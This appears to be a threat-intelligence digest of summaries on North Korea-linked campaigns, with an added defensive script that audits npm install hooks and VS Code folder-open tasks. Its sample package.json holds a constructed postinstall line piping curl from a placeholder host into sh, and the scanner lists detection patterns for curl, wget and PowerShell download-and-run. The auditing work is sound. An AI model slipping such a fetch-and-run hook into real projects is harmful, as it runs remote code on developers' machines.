DPRK-linked Contagious Interview activity is targeting cryptocurrency developers and blockchain companies through fake job interviews, poisoned GitHub repositories, and malicious npm packages. The report describes a multi-stage infection chain that abuses…
387 reports
Red Asgard identifies OtterCookie as a separate JavaScript and Node.js RAT operating alongside BeaverTail and InvisibleFerret in Lazarus-linked Contagious Interview activity. Unlike BeaverTail’s stored-data theft model, OtterCookie uses Socket.IO over Eng…
Logpresso analyzed four Kimsuky spear-phishing campaigns from early 2026 that used tailored lures against recruiters, business contacts, healthcare and insurance entities, cryptocurrency users and developers, defense-related personnel, and graduate-progra…
The episode examines the operator side of a Lazarus-attributed fake interview credential pipeline. The collection system reportedly captured material from operator workstations as well as targets, exposing social-engineering workflow, persona infrastructu…
Kimsuky has expanded its PebbleDash and AppleSeed-related operations with newly documented tooling, including the Rust-based HelloDoor backdoor, httpMalice, MemLoad/httpTroy, AppleSeed, HappyDoor, VSCode Remote Tunneling, and DWAgent. The campaigns use sp…
Krypt3ia assesses that enterprise AI systems are becoming high-value operational infrastructure because they ingest sensitive data, connect to internal workflows, and increasingly act with delegated authority. The North Korea-focused section argues that D…
CrowdStrike reports that DPRK-nexus actors drove a 51% year-over-year increase in digital asset theft in 2025, stealing a reported $2.02 billion across the financial sector. PRESSURE CHOLLIMA allegedly conducted the largest reported financial theft, takin…
Hybrid Analysis identified a VELVET CHOLLIMA-assessed infostealer operation distributing a signed Windows MSI that masquerades as the Tralert FX cryptocurrency trading application. The installer exposed live credentials and GitLab access tokens, revealing…
OpenSourceMalware shows how malicious packages and repositories abuse legitimate developer automation so payloads can run during `npm install` or when a repository is opened in VS Code. The DPRK-relevant section notes Lazarus-linked Contagious Interview a…
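The two execution hooks named in that summary are both declared in plain JSON files checked into the repository, so they can be audited before `npm install` is run or the folder is opened: npm's lifecycle scripts (`preinstall`, `install`, `postinstall`, `prepare`, `prepublish`) run automatically during a local `npm install`, and a VS Code task whose `runOptions.runOn` is `folderOpen` runs when the workspace is opened (once the folder is trusted). The script below is an added example written for this page, not code from the OpenSourceMalware report or from any project it describes; the `package.json` and `.vscode/tasks.json` contents are constructed in-memory samples, and the indicator regexes are heuristics chosen here, not a published detection rule.

```javascript
"use strict";
// Added example: audit a JavaScript project's auto-run hooks before trusting it.
// Inputs are constructed strings standing in for package.json and .vscode/tasks.json.

// npm lifecycle scripts that execute during a local `npm install` with no arguments.
// (`prepare` and the deprecated `prepublish` also run on a bare install in a checkout.)
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Heuristic indicators of a downloader or hidden execution stage (assumptions, not a rule set).
const SUSPICIOUS = [
  /\bcurl\b|\bwget\b/i,          // network fetch from a shell
  /node\s+-e\s/i,                // inline JavaScript passed to node
  /eval\(/i,                     // dynamic code evaluation
  /child_process/i,              // spawning shells from Node
  /base64/i,                     // encoded second stage
  /https?:\/\//i,                // hard-coded URL
  /powershell|\biex\b|Invoke-Expression/i, // Windows download-and-run idiom
];

function classify(cmd) {
  return SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
}

// Returns one finding per npm lifecycle hook that will run at install time.
function scanPackageJson(text) {
  const pkg = JSON.parse(text);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] === "string") {
      findings.push({
        source: "package.json",
        trigger: `npm install (${hook})`,
        command: scripts[hook],
        indicators: classify(scripts[hook]),
      });
    }
  }
  return findings;
}

// Returns one finding per VS Code task configured to run when the folder is opened.
function scanVsCodeTasks(text) {
  const cfg = JSON.parse(text);
  const findings = [];
  for (const task of cfg.tasks || []) {
    const runOn = task.runOptions && task.runOptions.runOn;
    if (runOn === "folderOpen") {
      const cmd = [task.command, ...(task.args || [])].filter(Boolean).join(" ");
      findings.push({
        source: ".vscode/tasks.json",
        trigger: `folderOpen (${task.label || "unnamed"})`,
        command: cmd,
        indicators: classify(cmd),
      });
    }
  }
  return findings;
}

// files: map of repo-relative path -> file contents. Only the two hook files are inspected.
function scanProject(files) {
  const out = [];
  if (files["package.json"]) out.push(...scanPackageJson(files["package.json"]));
  if (files[".vscode/tasks.json"]) out.push(...scanVsCodeTasks(files[".vscode/tasks.json"]));
  return out;
}

// Constructed sample: a benign build script, a postinstall downloader, one folderOpen task
// and one ordinary task. The URL is a placeholder, not a real indicator.
const SAMPLE_FILES = {
  "package.json": JSON.stringify({
    name: "demo-app",
    scripts: {
      build: "tsc -p .",
      postinstall: "node -e \"require('child_process').exec('curl -s http://example.invalid/s | sh')\"",
    },
  }),
  ".vscode/tasks.json": JSON.stringify({
    version: "2.0.0",
    tasks: [
      { label: "setup", type: "shell", command: "node", args: ["./scripts/setup.js"],
        runOptions: { runOn: "folderOpen" } },
      { label: "test", type: "shell", command: "npm", args: ["test"] },
    ],
  }),
};

for (const f of scanProject(SAMPLE_FILES)) {
  const flags = f.indicators.length ? `  <-- ${f.indicators.join(", ")}` : "";
  console.log(`[${f.source}] ${f.trigger}: ${f.command}${flags}`);
}
```

Run it with `node` against the sample and it reports two auto-run hooks: the `postinstall` script (flagged for `curl`, `node -e`, `child_process` and a URL) and the `setup` task that fires on folder open; the ordinary `build` script and `test` task are ignored. In practice the same two scans can be pointed at a cloned repository before installing, and `npm install --ignore-scripts` remains the simplest way to defer lifecycle execution until the scripts have been read.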
Kimsuky, also tracked as APT-C-55 and BabyShark, is described as an espionage-focused actor that targets government, diplomatic, think tank, media, and academic organizations tied to the Korean Peninsula and other regions. The observed campaign begins wit…
APT45 used AI at scale to recursively analyze CVEs and validate proof-of-concept exploits, showing DPRK-linked interest in AI-augmented vulnerability research and exploit development. GTIG also observed PRC and DPRK-associated clusters using persona-drive…
Arkham describes Lazarus Group as a North Korean state-sponsored hacking unit under the Reconnaissance General Bureau with a long record of major cyber operations, including Operation Troy, Sony Pictures, WannaCry, bank thefts, and cryptocurrency exchange…
A recruiter attributed to North Korea offered $300 per month for a US citizen, or $150 for an EU citizen, to create an Upwork account for his use. The pitch included follow-on compensation of 15% of monthly income after four months, with payment offered i…
An attacker attributed by LayerZero to the DPRK drained about $292 million in rsETH from KelpDAO's LayerZero-powered OFT bridge on April 18, 2026. The excerpt says the attacker compromised Unichain RPC infrastructure used by LayerZero Labs' Gasolina DVN s…
A suspected DPRK IT worker allegedly gained employment at THORSwap and submitted eight pull requests to the official swapkit/SwapKit repository between July and September 2024, with at least three merged. The merged PRs changed wallet integration code for…